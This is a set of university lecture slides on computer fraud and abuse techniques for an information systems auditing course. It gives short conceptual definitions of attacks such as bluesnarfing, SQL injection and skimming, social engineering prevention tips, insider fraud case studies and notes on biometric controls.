CHAPTER 10 Audit in CIS Environment

CHAPTER 10
COMPUTER FRAUD AND

ABUSE TECHNIQUES
Ninia C. Pauig-Lumauan, MBA, CPA

1st Semester SY 2021-2022
Lyceum of Aparri
Auditing- Information System

COMPUTER VIRUSES
• The digital world became a more

dangerous place as virtually all companies
are connected to the Internet.
• With technological advancement, online
banking has also been introduced to the
previously conservative staunch of banks.
With this scenario, a depositor need not
visit his preferred bank for transfer and/or
withdrawal transactions.
COMPUTER VIRUSES
• All he needs is to use the app available in

his Smartphone or on his computer and
lo..he can pay his bills and other
obligations.
• However, it is necessary that all concerned
be on the lookout for hackers and these
banks provide safety nets for security of
depositors. Take the case of the recent BDO
fiasco where P 50 million were transferred
out from almost 700 depositors.
COMPUTER VIRUSES
• With Covid 19 Pandemic, even ordinary
households are connected to the Internet
as it has become mandatory for
educational learning of pupils and students
and the “work from home” workforce.
• Computer viruses and worms, once slowly
propagated through the sharing of
computer disks, could now grow with
tremendous speed via the Internet.

COMPUTER VIRUSES
• Computer fraud and abuses have also
been slowly introduced into the digital
world. These abuses can come from
within the companies and even outside.
• Many viruses and worms exploit known
software vulnerabilities that can be
corrected with a software patch.

COMPUTER VIRUSES
• Therefore, a good defense against them

is making sure that all software patches
are installed as soon as they are
available.
• A software patch can be an upgrade
(adding increased features), a bug fix, a
new hardware driver or update to
address new issues such as security or
stability problems.
COMPUTER VIRUSES
• Recent viruses and worms have attacked
cellphones and personal electronic devices
using text messages, Internet page
downloads, and Bluetooth wireless
technology.
• Flaws in the bluetooth applications open the
system to attack.
• Bluesnarfing is stealing (snarfing) contact
lists, images and other data using Bluetooth.

ILLUSTRATIVE EXAMPLE OF BLUESNARFING
• A reporter for TimesOnline accompanied

Adam Laurie, a security expert, around
London scanning for Bluetooth-
compatible phones.
• Before a Bluetooth connection can be
made, the person contacted must agree
to accept the link.

ILLUSTRATIVE EXAMPLE OF BLUESNARFING
• However, Laurie has written software to

bypass this control and identified
vulnerable handsets at an average rate of
one per minute. He downloaded entire
phonebooks, calendars, diary contents
and stored pictures. Phones up to 90
meters away were vulnerable.

BLUEBUGGING
• Bluebugging is taking control of
someone else’s phone to make or listen
to calls, send or read text messages,
connect to the Internet, forward the
victim’s calls, and call numbers that
charge fees.
• These attacks will become more popular
as phones are used to pay for items
purchased.
BLUEBUGGING
• When a hacker wants something, all he
has to do is bluebug a nearby phone and
make a purchase. To prevent these
attacks a bluetooth can be set to make it
hard for other devices to recognize it.
• Antivirus software for phones is being
developed to deal with such problems.

BLUEBUGGING
• In the future, many other devices such as
home security systems, home appliances,
automobiles and elevators will be
connected to the Internet and will be the
target of viruses and worms.

COMPUTER FRAUD AND ABUSE
TECHNIQUES
TECHNIQUE DESCRIPTION
Address Sending fake ARP messages to an Ethernet
Resolution LAN. ARP is a networking computer
Protocol (ARP) protocol for determining a network host’s
Spoofing hardware address when only its IP or
network address is know.
Adware Software that collects and forwards data to
advertising companies or causes banner ads
to pop up as the Internet is surfed.
Bluebugging Taking control of a phone to make calls, send
text messages, listen to calls or read text
messages.

TECHNIQUES
Bluesnarfing Stealing contact lists, images and other data
using Bluetooth.
Bot Net, Bot A network of hijacked computers. Bot herders
Herders use the hijacked computers called zombies in
a variety of Internet attacks.
Buffer Overflow Inputting so much data that the input buffer
Attack overflows. The overflow contains code that
takes control of the computer.
Caller ID Displaying an incorrect number on the
Spoofing recipient’s Caller ID display to hide the identity
of the caller.

TECHNIQUES
Carding Verifying credit validity, buying and selling
stolen credit cards.
Chipping Planting a chip that records transaction data in
a legitimate card reader.
Cross Site Exploits Web page security vulnerabilities to
Scripting (XSS) bypass browser security mechanisms and
Attack create a malicious link that injects unwanted
code into a Web site.
Cyber Bullying Using computer technology to harm another
person.

TECHNIQUES
Cyber Extortion Requiring a company to pay money to keep an
extortionist from harming a computer or a
person.
Data Diddling Changing data before, during, or after it is
entered into the system.
Data Leakage Unauthorized copying of company data.
Denial of Service An attack designed to make computer
Attack resources unavailable to its users. For
example, so many e-mail messages that the
Internet Service Provider’s e-mail server is
overloaded and shut down.

TECHNIQUES
Dictionary Attack Using software to guess company addresses,
send employees blank e-mails, and add
unreturned messages to spammer e-mail
lists.
DNS Spoofing Sniffing the ID of a Domain Name System

(server that converts a Web site name to an
IP address request and replying before the
real DNS server.
Eavesdropping Listening to private voice or data

transmissions.

COMPUTER FRAUD AND ABUSE TECHNIQUES
Economic The theft of information, trade secrets and
Espionage intellectual property.
E-mail Threats Sending a threatening message asking recipients
to do something that makes it possible to defraud
them.
E-mail Spoofing Making a sender address and other parts of an e-
mail header appear as though the e-mail
originated from a different source.
Evil Twin A wireless network with the same name as
another wireless access point. User unknowingly
connect to the evil twin, hackers monitor the
traffic looking for useful information.

TECHNIQUES
Hacking Unauthorized access, modification, or use of
computer systems, usually by means of a PC
and a communications network.
Hijacking Gaining control of someone else’s computer
for illicit activities.
IP Address Creating Internet Protocol packets with a
Spoofing forged IP address to hide the sender’s identity
or to impersonate another computer system.
Identity Theft Assuming someone’s identity by illegally
obtaining confidential information such as a
Social Security Number.

TECHNIQUES
Internet Auction Using the Internet auction site to commit
Fraud fraud.
Internet Using the Internet to spread raise or
Misinformation misleading information.
Internet TerrorismUsing the Internet to disrupt
communications and commerce.
Internet Pump and Using the Internet to pump up the price of a
Dump Fraud stock and then sell it.
Key Logger Using spyware to record a user’s keystrokes.

Lebanese Inserting a sleeve into an ATM so that it will not
Looping eject the victim’s card, pretending to help the
victim as a means to discover his or her PIN and
then using the card and the PIN to drain the
account.
Logic Bombs and Software that sits idle until a specified
Time Bombs circumstance or time triggers it, destroying
programs, data or both.
Malware Software that can be used to do harm.
Man in the A hacker placing himself between a client and a
Middle (MITM) host to intercept network traffic also called
Attack session hijacking.

Masquerading/ Accessing a system by pretending to be an
Impersonation authorized user. The impersonator enjoys
the same privileges as the legitimate user.
Packet Sniffing Inspecting information packets as they
travel the Internet and other networks.
Password Cracking Penetrating system defenses, stealing
passwords, and decrypting them to access
system programs, files and data.
Pharming Redirecting traffic to a spoofed Web site to
obtain confidential information.

TECHNIQUES
Phishing Communications that request recipients to disclose
confidential information by responding to an e-mail
or visiting a Web site.
Phreaking Attacking phone systems to get free phone access;
using phone lines to transmit viruses and to access,
steal and destroy data.
Piggybacking 1. Clandestine use of someone’s Wi-fi Network.
2. Tapping into a communication line and entering
a system by and latching onto a legitimate user.
3. By-passing physical security controls by entering
a secure door when an authorized person opens
it.

TECHNIQUES
Podslurping Using a small device with storage capacity (Ipod,
Flash drive) to download unauthorized data from
a computer.
Posing Creating a seemingly legitimate business,
collecting personal data while making a sale and
never delivering items sold.
Pretexting Activity under false pretenses to gain
confidential information.
Rootkit Software that conceals processes, files, network
connections and system data from the operating
system and other programs.

TECHNIQUES
Round-Down Truncating interest calculations at two decimal
Fraud places and placing truncated amounts in the
perpetrator’s account.
Ransomware Software that encrypts programs and data until a
ransom is paid to remove it.
Salami Technique Stealing tiny slices of money over time.
Scareware Malicious software of no benefit that is sold
using scare tactics.
Scavenging/ Searching for confidential information by
Dumpster Diving searching for documents and records in garbage
cans, communal trash bins and city dumps

Sexting Exchanging explicit texts and pictures.
Shoulder Surfing Watching or listening to people enter or
disclose confidential data.
Skimming Double swiping a credit card or covertly
swiping it in a card reader that records the
data for later use.
SMS Spoofing Using short message service (SMS) to change
the name or number a text message appears
to come from.
Social Engineering Techniques that trick a person into disclosing
confidential information.

TECHNIQUES
Software Piracy Unauthorized copying or distribution of
copyrighted software.
Spamming E-mailing of unsolicited message to many
people at the same time.
Splog A spam blog that promotes Web sites to
increase their Google Page Rank (how often a
Web page is referenced by other pages)
Spyware Software that monitors computing habits and
sends that data to someone else, often
without the user’s permission.

TECHNIQUES
Spoofing Making electronic communications look like
someone else sent it.
SQL Injection Inserting a malicious SQL query in input in
Attack such a way that is passed to and executed by
an application program.
Steganogrophy Hiding data from one file inside a host file,
such as a large image or sound file.
Superzapping Using special software to bypass system
controls and perform illegal acts.
Tabnapping Secretly changing an already open browser
tab using Java Script.

TECHNIQUES
Trap Door A back door into a system that bypasses normal
system controls.
Trojan Horse Unauthorized code in an authorized and properly
functioning program.
Typosquatting/ Web sites with names similar to real Web sites,
URL Hijacking users making typographical errors are sent to a
site filled with malware.
Virus Executable code that attaches itself to software,
replicates itself and spreads to other systems or
files. Triggered by a predefined event, it
damages system resources or displays messages.

TECHNIQUES
Vishing Voice phishing in which e-mail recipients are
asked to call a phone number that asks them to
divulge confidential data.
War Dialing Dialing phone lines to find idle modems to use
to enter a system, capture the attached
computer and gain access to its network (s).
War Driving/ Looking for unprotected wireless networks
Rocketing using a car or a rocket.
Web Cramming Developing a free and worthless trial version
Web site and charging the subscriber’s phone
bill for months even if the subscriber cancels.

TECHNIQUES
Web Page Also called phishing.
Spoofing
Worm Similar to a virus; a program rather than a
code segment hidden in a host program.
Actively transmits itself to other systems. It
usually does not live long but is quite
destructive while alive.
Zero Day Attack Attack between the time a software
vulnerability is discovered and a patch to fix
the problem is released.

ONLINE SOCIAL ENGINEERING
• On line social engineering is on the rise.
• On line social engineering is when
scammers emotionally manipulate you
into handing over your personal
information. They take advantage of
human behavior and trick you into
thinking they’re the real deal.

FOUR TIPS to PREVENT A SOCIAL
ENGINEERING ATTACK:
1. Never reveal passwords or PINs via
email or phone, no matter how
legitimate the request seems.
Companies don’t ask for these this
way.

2. Call them back. If you receive a call

from a company requesting sensitive
information, ask for their full name and
call back on the number from their
website.
3. Resist the urge to click on suspicious
links from anyone, even if you think
you know them-always double check
the web address first.
4. Think twice. If something sounds too
good to be true, then it probably is. Even
if it looks and sounds like its coming from
a reputable source.
SOCIAL ENGINEERING: WHAT DOES IT
LOOK LIKE?
• Phishing, Smishing, Vishing –
scammers will reach you using e-mails,
SMS and phone calls.
SOCIAL ENGINEERING: WHAT DOES IT LOOK LIKE?
• Quid Pro Quo – Quite often, scammers

will offer you something like technical
assistance, access to a protected
document, or a solution for a problem.
They may not ask for money. Their goal
is your login details, which they can use
or sell.

SOCIAL ENGINEERING: WHAT DOES IT LOOK
LIKE?
• Capturing Curiosity – Curiosity is a big
part of our human nature – it’s how we
evolve. But it’s also a weakness for
scammers to exploit. Found an
abandoned USB stick? Never put it into
your computer. It’s an easy way for
hackers to break in.

LIKE?
• Pretexting – This is when a hacker
gathers information on you in order to
gain your trust. One way is
impersonating someone from your
workplace and requesting changes to
payments. This one commonly targets
finance teams and is often successful.

LIKE?
• Your antivirus protects you from phishing
emails, including suspicious links and
downloads, but social engineering plays
on the weaknesses of human nature.
• That’s why it’s so important to be familiar
with various types of social engineering
scams – so you can avoid them.

INSIDER ABUSE OF INTERNET ACCESS
Robert Hanssen, an FBI agent with high
security clearance, was one of the most
damaging spies in U.S. history. Hanssen
was convicted of espionage by spying for
Russia for 22 years. Hanssen said that
security was so lax at FBI headquarters
that he never worried about being
searched.

• He combed the FBI’s computer system to
obtain and disseminate over 6,000
classified documents and even to check
whether he was under suspicion.
• He was quoted as saying “Any clerk in the
bureau could come up with stuff on that
system. It was pathetic.”

• The FBI reportedly cancelled a classified
computer system fearing Hanssen, a
skilled computer programmer, might
have planted malicious code or a back
door into the system.

Frank Gruttadauria, a former Lehman

Brothers Holdings, Inc., stockbroker
manager, admitted in 2002 to bilking
investors out of $277 million over the
past 15 years. He simply shifted money
from one account to another,
systematically looting each one.

Timothy Lloyd, a former New Jersey
computer programmer for Omega
Engineering Corporation, was convicted in
May 2000 of causing about $12 million in
damages. Prior to being fired in 1996, Lloyd
planted a logic bomb that erased all Omega’s
contracts and the proprietary software used
by the company’s manufacturing tools. One
Omega manager said that it would “never
recover.” Lloyd’s actions also caused the layoff
of 80 employees. Auditing- Information System
Bill Conley, former president of U.S.

Computer Corporation of Redmond,
Washington, pled guilty to federal wire-
fraud charges and agreed to pay Hewlett-
Packard (HP) $1.5 million after admitting
he had paid an HP employee to reveal
competitors’ bids on used computer
servers, thereby enabling him to buy the
equipment by submitting slightly higher
bids.
• These cases are only those that involved
insiders.
• Even more common are cases of fraud
and identity theft by criminals external to
organizations.

• To help combat the threats of terrorism,

insider abuse, external fraud, identity
theft, and other major risks, all
organizations must be more diligent
about implementing internal controls,
including computer security and physical
security, operational and accounting
controls, and employee and consultant
background checks.
• Organizations must also work in harmony

with applicable governmental agencies
so that offenders can be charged and any
necessary changes can be made to
applicable laws and regulations.
• In extreme cases, such cooperation could
even help military leaders determine
where to deploy support.

BIOMETRIC TECHNOLOGIES
• Biometric technologies generally refer to

the use of technology to identify a
person based on some aspect of their
biology.
• Fingerprint recognition is one of the first
and original biometric technologies that
have been grouped loosely under digital
forensics.

• Others are iris-scanning, and foot
scamming technology and voice pattern ID
as well as Facial recognition.
• Biometric technologies are gaining in
reliability and costs have come down.
• Therefore, applications of biometric
technologies to access controls that help
prevent fraud and help ensure security are
becoming more commonplace.
• One credit union is using hand-image
verification in conjunction with a
personal identification number to
provide unescorted access to safe
deposit boxes.
• Similar technologies are becoming
available for automatic teller machines,
airport security devices, driver’s licenses,
and state-issued identification cards.
• While biometric controls will likely
replace or at least supplement passwords
and additional controls, they, too, can be
circumvented. A Japanese researcher
recently found that he could create fake
fingers from gelatin and fool fingerprint
readers an average of 80 percent of the
time.

• Perhaps a more critical concern would be

theft of the electronic “prints” of
innocent people and subsequent usage
of the information to steal identities.
• Therefore, IS auditors will need to be
alert to the limitations of the biometrics
that they encounter in their organization.

CONCLUSION
• Given the various role hats IT auditors
can wear, they must keep updated with
reviews and changes in the existing laws
governing the use of computers and the
Internet.
• IT auditors can provide leverage in
helping organizations understand the
risks they face and the potential for
consequences.
CONCLUSION
• Since the culture and operational
practices of each organization and within
each country are different, it is up to the
internal and external auditors of all
organizations to ensure that management
is aware of the IS risks discussed, any risks
that are unique to their organizations and
countries, and the new risks posed by
emerging technologies and terrorism.
CONCLUSION
• Once risks are identified, internal
controls can be tailored to mitigate them
and to result in healthy and thriving IS
environments within their organizations,
as well as a safer world for all of us.

CHAPTER 10 Audit in CIS Environment

Uploaded by

Document Information

Original Description:

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

CHAPTER 10 Audit in CIS Environment

Uploaded by

Copyright:

Available Formats

CHAPTER 10

COMPUTER FRAUD AND

Ninia C. Pauig-Lumauan, MBA, CPA

Auditing- Information System

• The digital world became a more

• All he needs is to use the app available in

Auditing- Information System

Auditing- Information System

• Therefore, a good defense against them

Auditing- Information System

• A reporter for TimesOnline accompanied

Auditing- Information System

• However, Laurie has written software to

Auditing- Information System

Auditing- Information System

Auditing- Information System

Auditing- Information System

Auditing- Information System

Auditing- Information System

Auditing- Information System

DNS Spoofing Sniffing the ID of a Domain Name System

Eavesdropping Listening to private voice or data

Auditing- Information System

Auditing- Information System

Auditing- Information System

Auditing- Information System

Auditing- Information System

Auditing- Information System

Auditing- Information System

Auditing- Information System

Auditing- Information System

Auditing- Information System

Auditing- Information System

Auditing- Information System

Auditing- Information System

Auditing- Information System

Auditing- Information System

Auditing- Information System

Auditing- Information System

2. Call them back. If you receive a call

• Quid Pro Quo – Quite often, scammers

Auditing- Information System

Auditing- Information System

Auditing- Information System

Auditing- Information System

Auditing- Information System

Auditing- Information System

Auditing- Information System

Frank Gruttadauria, a former Lehman

Auditing- Information System

Bill Conley, former president of U.S.

Auditing- Information System

• To help combat the threats of terrorism,

• Organizations must also work in harmony

Auditing- Information System

• Biometric technologies generally refer to

Auditing- Information System

Auditing- Information System

• Perhaps a more critical concern would be

Auditing- Information System

Auditing- Information System

You might also like